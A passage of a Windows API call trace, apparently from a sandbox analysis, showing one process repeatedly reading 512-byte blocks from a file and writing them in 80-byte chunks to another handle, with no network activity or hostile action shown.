[0145.408] GetFileType (hFile=0x50) returned 0x1 [0145.408] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.408] WriteFile (in: hFile=0x50, lpBuffer=0x18f3bc*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f3bc*, lpNumberOfBytesWritten=0x18e3c0*=0x20, lpOverlapped=0x0) returned 1 [0145.408] _get_osfhandle (_FileHandle=4) returned 0x58 [0145.408] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18e3ac | out: lpNewFilePointer=0x0) returned 1 [0145.408] _get_osfhandle (_FileHandle=4) returned 0x58 [0145.408] ReadFile (in: hFile=0x58, lpBuffer=0x18f1dc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e3cc, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesRead=0x18e3cc*=0x200, lpOverlapped=0x0) returned 1 [0145.408] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.408] GetFileType (hFile=0x50) returned 0x1 [0145.408] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.408] GetFileType (hFile=0x50) returned 0x1 [0145.408] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.408] WriteFile (in: hFile=0x50, lpBuffer=0x18f1dc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.408] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.408] GetFileType (hFile=0x50) returned 0x1 [0145.408] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.408] WriteFile (in: hFile=0x50, lpBuffer=0x18f22c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f22c*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.408] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.408] GetFileType (hFile=0x50) returned 0x1 [0145.408] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.408] WriteFile (in: hFile=0x50, lpBuffer=0x18f27c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, 
lpOverlapped=0x0 | out: lpBuffer=0x18f27c*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.408] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.408] GetFileType (hFile=0x50) returned 0x1 [0145.409] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.409] WriteFile (in: hFile=0x50, lpBuffer=0x18f2cc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f2cc*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.409] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.409] GetFileType (hFile=0x50) returned 0x1 [0145.409] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.409] WriteFile (in: hFile=0x50, lpBuffer=0x18f31c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f31c*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.409] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.409] GetFileType (hFile=0x50) returned 0x1 [0145.409] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.409] WriteFile (in: hFile=0x50, lpBuffer=0x18f36c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f36c*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.409] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.409] GetFileType (hFile=0x50) returned 0x1 [0145.409] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.409] WriteFile (in: hFile=0x50, lpBuffer=0x18f3bc*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f3bc*, lpNumberOfBytesWritten=0x18e3c0*=0x20, lpOverlapped=0x0) returned 1 [0145.409] _get_osfhandle (_FileHandle=4) returned 0x58 [0145.409] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18e3ac | out: lpNewFilePointer=0x0) returned 1 [0145.409] _get_osfhandle (_FileHandle=4) returned 0x58 [0145.409] ReadFile (in: hFile=0x58, lpBuffer=0x18f1dc, 
nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e3cc, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesRead=0x18e3cc*=0x200, lpOverlapped=0x0) returned 1 [0145.409] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.409] GetFileType (hFile=0x50) returned 0x1 [0145.409] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.409] GetFileType (hFile=0x50) returned 0x1 [0145.409] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.409] WriteFile (in: hFile=0x50, lpBuffer=0x18f1dc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.409] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.409] GetFileType (hFile=0x50) returned 0x1 [0145.409] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.409] WriteFile (in: hFile=0x50, lpBuffer=0x18f22c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f22c*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.409] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.409] GetFileType (hFile=0x50) returned 0x1 [0145.409] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.409] WriteFile (in: hFile=0x50, lpBuffer=0x18f27c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f27c*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.409] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.409] GetFileType (hFile=0x50) returned 0x1 [0145.409] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.410] WriteFile (in: hFile=0x50, lpBuffer=0x18f2cc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f2cc*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.410] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.410] GetFileType (hFile=0x50) returned 0x1 [0145.410] _get_osfhandle (_FileHandle=1) returned 
0x50 [0145.410] WriteFile (in: hFile=0x50, lpBuffer=0x18f31c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f31c*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.410] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.410] GetFileType (hFile=0x50) returned 0x1 [0145.410] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.410] WriteFile (in: hFile=0x50, lpBuffer=0x18f36c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f36c*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.410] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.410] GetFileType (hFile=0x50) returned 0x1 [0145.410] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.410] WriteFile (in: hFile=0x50, lpBuffer=0x18f3bc*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f3bc*, lpNumberOfBytesWritten=0x18e3c0*=0x20, lpOverlapped=0x0) returned 1 [0145.410] _get_osfhandle (_FileHandle=4) returned 0x58 [0145.410] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18e3ac | out: lpNewFilePointer=0x0) returned 1 [0145.410] _get_osfhandle (_FileHandle=4) returned 0x58 [0145.410] ReadFile (in: hFile=0x58, lpBuffer=0x18f1dc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e3cc, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesRead=0x18e3cc*=0x200, lpOverlapped=0x0) returned 1 [0145.410] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.410] GetFileType (hFile=0x50) returned 0x1 [0145.410] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.410] GetFileType (hFile=0x50) returned 0x1 [0145.410] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.410] WriteFile (in: hFile=0x50, lpBuffer=0x18f1dc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) 
returned 1 [0145.410] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.410] GetFileType (hFile=0x50) returned 0x1 [0145.410] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.410] WriteFile (in: hFile=0x50, lpBuffer=0x18f22c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f22c*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.410] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.410] GetFileType (hFile=0x50) returned 0x1 [0145.410] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.410] WriteFile (in: hFile=0x50, lpBuffer=0x18f27c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f27c*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.410] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.410] GetFileType (hFile=0x50) returned 0x1 [0145.410] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.410] WriteFile (in: hFile=0x50, lpBuffer=0x18f2cc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f2cc*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.411] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.411] GetFileType (hFile=0x50) returned 0x1 [0145.411] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.411] WriteFile (in: hFile=0x50, lpBuffer=0x18f31c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f31c*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.411] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.411] GetFileType (hFile=0x50) returned 0x1 [0145.411] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.411] WriteFile (in: hFile=0x50, lpBuffer=0x18f36c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f36c*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.411] _get_osfhandle 
(_FileHandle=1) returned 0x50 [0145.411] GetFileType (hFile=0x50) returned 0x1 [0145.411] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.411] WriteFile (in: hFile=0x50, lpBuffer=0x18f3bc*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f3bc*, lpNumberOfBytesWritten=0x18e3c0*=0x20, lpOverlapped=0x0) returned 1 [0145.411] _get_osfhandle (_FileHandle=4) returned 0x58 [0145.411] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18e3ac | out: lpNewFilePointer=0x0) returned 1 [0145.411] _get_osfhandle (_FileHandle=4) returned 0x58 [0145.411] ReadFile (in: hFile=0x58, lpBuffer=0x18f1dc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e3cc, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesRead=0x18e3cc*=0x200, lpOverlapped=0x0) returned 1 [0145.411] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.411] GetFileType (hFile=0x50) returned 0x1 [0145.411] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.411] GetFileType (hFile=0x50) returned 0x1 [0145.411] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.411] WriteFile (in: hFile=0x50, lpBuffer=0x18f1dc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.411] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.411] GetFileType (hFile=0x50) returned 0x1 [0145.411] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.411] WriteFile (in: hFile=0x50, lpBuffer=0x18f22c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f22c*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.411] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.411] GetFileType (hFile=0x50) returned 0x1 [0145.411] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.411] WriteFile (in: hFile=0x50, lpBuffer=0x18f27c*, nNumberOfBytesToWrite=0x50, 
lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f27c*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.411] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.411] GetFileType (hFile=0x50) returned 0x1 [0145.411] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.411] WriteFile (in: hFile=0x50, lpBuffer=0x18f2cc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f2cc*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.412] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.412] GetFileType (hFile=0x50) returned 0x1 [0145.412] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.412] WriteFile (in: hFile=0x50, lpBuffer=0x18f31c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f31c*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.412] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.412] GetFileType (hFile=0x50) returned 0x1 [0145.412] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.412] WriteFile (in: hFile=0x50, lpBuffer=0x18f36c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f36c*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.412] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.412] GetFileType (hFile=0x50) returned 0x1 [0145.412] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.412] WriteFile (in: hFile=0x50, lpBuffer=0x18f3bc*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f3bc*, lpNumberOfBytesWritten=0x18e3c0*=0x20, lpOverlapped=0x0) returned 1 [0145.412] _get_osfhandle (_FileHandle=4) returned 0x58 [0145.412] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18e3ac | out: lpNewFilePointer=0x0) returned 1 [0145.412] _get_osfhandle (_FileHandle=4) returned 0x58 [0145.412] ReadFile 
(in: hFile=0x58, lpBuffer=0x18f1dc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e3cc, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesRead=0x18e3cc*=0x200, lpOverlapped=0x0) returned 1 [0145.412] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.412] GetFileType (hFile=0x50) returned 0x1 [0145.412] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.412] GetFileType (hFile=0x50) returned 0x1 [0145.412] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.412] WriteFile (in: hFile=0x50, lpBuffer=0x18f1dc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.412] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.412] GetFileType (hFile=0x50) returned 0x1 [0145.412] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.412] WriteFile (in: hFile=0x50, lpBuffer=0x18f22c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f22c*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.412] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.412] GetFileType (hFile=0x50) returned 0x1 [0145.412] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.412] WriteFile (in: hFile=0x50, lpBuffer=0x18f27c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f27c*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.412] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.412] GetFileType (hFile=0x50) returned 0x1 [0145.412] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.412] WriteFile (in: hFile=0x50, lpBuffer=0x18f2cc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f2cc*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.413] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.413] GetFileType (hFile=0x50) returned 0x1 [0145.413] 
_get_osfhandle (_FileHandle=1) returned 0x50 [0145.413] WriteFile (in: hFile=0x50, lpBuffer=0x18f31c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f31c*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.413] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.413] GetFileType (hFile=0x50) returned 0x1 [0145.413] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.413] WriteFile (in: hFile=0x50, lpBuffer=0x18f36c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f36c*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.413] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.413] GetFileType (hFile=0x50) returned 0x1 [0145.413] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.413] WriteFile (in: hFile=0x50, lpBuffer=0x18f3bc*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f3bc*, lpNumberOfBytesWritten=0x18e3c0*=0x20, lpOverlapped=0x0) returned 1 [0145.413] _get_osfhandle (_FileHandle=4) returned 0x58 [0145.413] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18e3ac | out: lpNewFilePointer=0x0) returned 1 [0145.413] _get_osfhandle (_FileHandle=4) returned 0x58 [0145.413] ReadFile (in: hFile=0x58, lpBuffer=0x18f1dc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e3cc, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesRead=0x18e3cc*=0x200, lpOverlapped=0x0) returned 1 [0145.413] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.413] GetFileType (hFile=0x50) returned 0x1 [0145.413] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.413] GetFileType (hFile=0x50) returned 0x1 [0145.413] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.413] WriteFile (in: hFile=0x50, lpBuffer=0x18f1dc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, 
lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.413] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.413] GetFileType (hFile=0x50) returned 0x1 [0145.413] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.413] WriteFile (in: hFile=0x50, lpBuffer=0x18f22c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f22c*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.413] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.413] GetFileType (hFile=0x50) returned 0x1 [0145.413] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.413] WriteFile (in: hFile=0x50, lpBuffer=0x18f27c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f27c*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.413] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.413] GetFileType (hFile=0x50) returned 0x1 [0145.413] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.413] WriteFile (in: hFile=0x50, lpBuffer=0x18f2cc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f2cc*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.414] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.414] GetFileType (hFile=0x50) returned 0x1 [0145.414] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.414] WriteFile (in: hFile=0x50, lpBuffer=0x18f31c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f31c*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.414] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.414] GetFileType (hFile=0x50) returned 0x1 [0145.414] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.414] WriteFile (in: hFile=0x50, lpBuffer=0x18f36c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f36c*, lpNumberOfBytesWritten=0x18e3c0*=0x50, 
lpOverlapped=0x0) returned 1 [0145.414] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.414] GetFileType (hFile=0x50) returned 0x1 [0145.414] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.414] WriteFile (in: hFile=0x50, lpBuffer=0x18f3bc*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f3bc*, lpNumberOfBytesWritten=0x18e3c0*=0x20, lpOverlapped=0x0) returned 1 [0145.414] _get_osfhandle (_FileHandle=4) returned 0x58 [0145.414] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18e3ac | out: lpNewFilePointer=0x0) returned 1 [0145.414] _get_osfhandle (_FileHandle=4) returned 0x58 [0145.414] ReadFile (in: hFile=0x58, lpBuffer=0x18f1dc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e3cc, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesRead=0x18e3cc*=0x200, lpOverlapped=0x0) returned 1 [0145.414] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.414] GetFileType (hFile=0x50) returned 0x1 [0145.414] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.414] GetFileType (hFile=0x50) returned 0x1 [0145.414] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.414] WriteFile (in: hFile=0x50, lpBuffer=0x18f1dc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.414] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.414] GetFileType (hFile=0x50) returned 0x1 [0145.414] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.414] WriteFile (in: hFile=0x50, lpBuffer=0x18f22c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f22c*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.414] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.414] GetFileType (hFile=0x50) returned 0x1 [0145.414] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.414] WriteFile (in: hFile=0x50, 
lpBuffer=0x18f27c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f27c*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.414] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.414] GetFileType (hFile=0x50) returned 0x1 [0145.414] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.414] WriteFile (in: hFile=0x50, lpBuffer=0x18f2cc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f2cc*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.414] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.415] GetFileType (hFile=0x50) returned 0x1 [0145.415] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.415] WriteFile (in: hFile=0x50, lpBuffer=0x18f31c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f31c*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.415] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.415] GetFileType (hFile=0x50) returned 0x1 [0145.415] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.415] WriteFile (in: hFile=0x50, lpBuffer=0x18f36c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f36c*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.415] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.415] GetFileType (hFile=0x50) returned 0x1 [0145.415] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.415] WriteFile (in: hFile=0x50, lpBuffer=0x18f3bc*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f3bc*, lpNumberOfBytesWritten=0x18e3c0*=0x20, lpOverlapped=0x0) returned 1 [0145.415] _get_osfhandle (_FileHandle=4) returned 0x58 [0145.415] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18e3ac | out: lpNewFilePointer=0x0) returned 1 [0145.415] _get_osfhandle 
